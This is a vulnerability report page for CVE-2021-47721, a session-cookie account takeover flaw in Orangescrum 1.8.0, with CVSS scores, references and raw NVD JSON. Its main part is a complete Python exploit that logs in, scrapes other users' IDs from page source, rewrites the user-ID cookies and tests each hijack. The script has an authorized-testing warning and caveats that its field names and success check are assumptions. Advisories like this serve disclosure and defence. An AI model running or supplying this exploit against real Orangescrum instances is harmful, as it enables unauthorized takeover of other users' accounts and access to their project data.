Security Vulnerability Report
CVE-2021-47721 CVSS 8.8 HIGH

CVE-2021-47721

Published: 2025-12-23 20:15:45
Last Modified: 2025-12-31 21:44:19

Description

Orangescrum 1.8.0 contains a privilege escalation vulnerability that allows authenticated users to take over other project-assigned accounts by manipulating session cookies. Attackers can extract the victim's unique ID from the page source and replace their own session cookie to gain unauthorized access to another user's account. NVD classifies the weakness as CWE-639 (Authorization Bypass Through User-Controlled Key): the application appears to trust a client-supplied user identifier carried in the cookie instead of binding identity to the server-side session, so any authenticated user who learns another user's ID can act as that user.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS 3.1 Vector (the raw data below also carries a CVSS 4.0 vector from the same source with base score 8.7 HIGH)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:orangescrum:orangescrum:1.8.0:*:*:*:*:*:*:* - VULNERABLE
Orangescrum 1.8.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. It is a reconstructed proof of concept: the login form field names, the candidate cookie names it rewrites, and the page markup it scrapes are assumptions that must be confirmed against the target instance, and its success check (an HTTP 200 containing "My Profile") is also satisfied by the attacker's own valid session, so any reported "success" should be validated manually, e.g. by confirming the displayed identity is the victim's.
python
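# CVE-2021-47721 PoC - Orangescrum Session Hijacking
# Demonstrates privilege escalation via session cookie manipulation
# (CWE-639 per NVD: a client-controlled user identifier is trusted by the server).
#
# Run only against an instance you are authorized to test.  The form field
# names, candidate cookie names and page markup used below come from a
# reconstructed PoC and are assumptions -- confirm each against the target
# (Set-Cookie headers, login form, /projects markup) before trusting a result.
import os
import re
import requests
from bs4 import BeautifulSoup

# Defaults match the original PoC; the environment variables let a tester
# point the script at a lab instance without editing credentials into the file.
# NOTE: the default scheme is plain http; against anything but a local lab use
# https, otherwise the very session cookies being tested travel in cleartext.
TARGET_URL = os.environ.get("ORANGESCRUM_URL", "http://target-orangescrum-server.com")
ATTACKER_EMAIL = os.environ.get("ORANGESCRUM_EMAIL", "[email protected]")
ATTACKER_PASSWORD = os.environ.get("ORANGESCRUM_PASSWORD", "attacker_password")

# Cookie names the PoC assumes carry the user identifier.  These are guesses
# ("common" names for a CakePHP app) -- verify against the target's Set-Cookie
# headers; if none of them is present, hijack_session() changes nothing.
SESSION_ID_COOKIES = ("user_id", "Auth", "CakeCookie[user_id]")


def login(username, password):
    """Authenticate to Orangescrum and return the logged-in Session, or None.

    Success is inferred, as in the original PoC, from the post-login URL
    containing "redirect".  That heuristic is unverified; check it against
    the real login flow before relying on the result.
    """
    session = requests.Session()
    login_url = f"{TARGET_URL}/users/login"
    data = {
        "data[User][email]": username,
        "data[User][password]": password,
    }
    response = session.post(login_url, data=data)
    return session if "redirect" in response.url else None


def extract_user_ids(session):
    """Return the distinct user IDs leaked into the /projects page source.

    Looks in ``data-user-id`` attributes and in hidden inputs whose name
    contains "user_id".  Missing/empty values are dropped so the hijack step
    never sets a cookie to the literal string "None".
    """
    response = session.get(f"{TARGET_URL}/projects")
    soup = BeautifulSoup(response.text, "html.parser")
    user_ids = set()
    for element in soup.find_all(attrs={"data-user-id": True}):
        user_ids.add(element["data-user-id"])
    for hidden_input in soup.find_all("input", type="hidden"):
        if "user_id" in hidden_input.get("name", "").lower():
            user_ids.add(hidden_input.get("value"))
    user_ids.discard(None)
    user_ids.discard("")
    return list(user_ids)


def hijack_session(original_session, target_user_id):
    """Clone the attacker's cookies, rewriting the user-ID cookie(s) to target_user_id.

    The rewrite preserves each cookie's domain and path.  Calling
    ``cookies.set(name, value)`` without them (as the original PoC did) adds a
    second cookie with an empty domain next to the original one, so the
    server may still receive the attacker's own ID and the test is
    inconclusive.  Prints a warning when none of SESSION_ID_COOKIES is present.
    """
    hijacked_session = requests.Session()
    rewritten = 0
    for cookie in original_session.cookies:
        if cookie.name in SESSION_ID_COOKIES:
            value = str(target_user_id)
            rewritten += 1
        else:
            value = cookie.value
        hijacked_session.cookies.set(
            cookie.name,
            value,
            domain=cookie.domain,
            path=cookie.path,
        )
    if not rewritten:
        print("[*] No known user-ID cookie found; check Set-Cookie and adjust SESSION_ID_COOKIES")
    return hijacked_session


def verify_hijack(session, *, baseline_text=None):
    """Return True if the session appears to be logged in as someone else.

    The original check -- HTTP 200 and "My Profile" in the body -- is also
    satisfied by the attacker's *own* valid session, so on its own it cannot
    prove a takeover.  When ``baseline_text`` (the attacker's own profile
    page) is given, a response identical to it is treated as a failure.
    Pages carrying per-request tokens may still differ without any takeover;
    a definitive check should compare the displayed user identity instead.
    """
    response = session.get(f"{TARGET_URL}/users/profile")
    if response.status_code != 200 or "My Profile" not in response.text:
        return False
    if baseline_text is not None and response.text == baseline_text:
        return False
    return True


def main():
    """Log in as the attacker, harvest leaked IDs, and attempt each takeover."""
    try:
        attacker_session = login(ATTACKER_EMAIL, ATTACKER_PASSWORD)
        if attacker_session is None:
            print("[!] Login failed")
            return
        # The attacker's own profile page is the baseline a hijacked
        # session must differ from (see verify_hijack).
        baseline = attacker_session.get(f"{TARGET_URL}/users/profile").text
        victim_ids = extract_user_ids(attacker_session)
        print(f"Found {len(victim_ids)} potential victim IDs: {victim_ids}")
        for victim_id in victim_ids:
            hijacked_session = hijack_session(attacker_session, victim_id)
            if verify_hijack(hijacked_session, baseline_text=baseline):
                print(f"[!] Successfully hijacked user ID: {victim_id}")
            else:
                print(f"[*] Failed to hijack user ID: {victim_id}")
    except requests.RequestException as exc:
        print(f"[!] Request failed: {exc}")


# Guarded so importing the module (e.g. from a test harness) does not fire
# requests at the target; the original ran everything at import time.
if __name__ == "__main__":
    main()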

References
- https://www.exploit-db.com/exploits/50551 (Exploit)
- https://www.orangescrum.org/ (Product)
- https://www.vulncheck.com/advisories/orangescrum-authenticated-privilege-escalation-via-user-session-manipulation (Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2021-47721", "sourceIdentifier": "[email protected]", "published": "2025-12-23T20:15:44.510", "lastModified": "2025-12-31T21:44:19.170", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Orangescrum 1.8.0 contains a privilege escalation vulnerability that allows authenticated users to take over other project-assigned accounts by manipulating session cookies. Attackers can extract the victim's unique ID from the page source and replace their own session cookie to gain unauthorized access to another user's account."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": 
"NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:orangescrum:orangescrum:1.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "0BFFFA2F-2A4C-43C5-8C33-4E74A44AD16E"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/50551", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.orangescrum.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/orangescrum-authenticated-privilege-escalation-via-user-session-manipulation", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}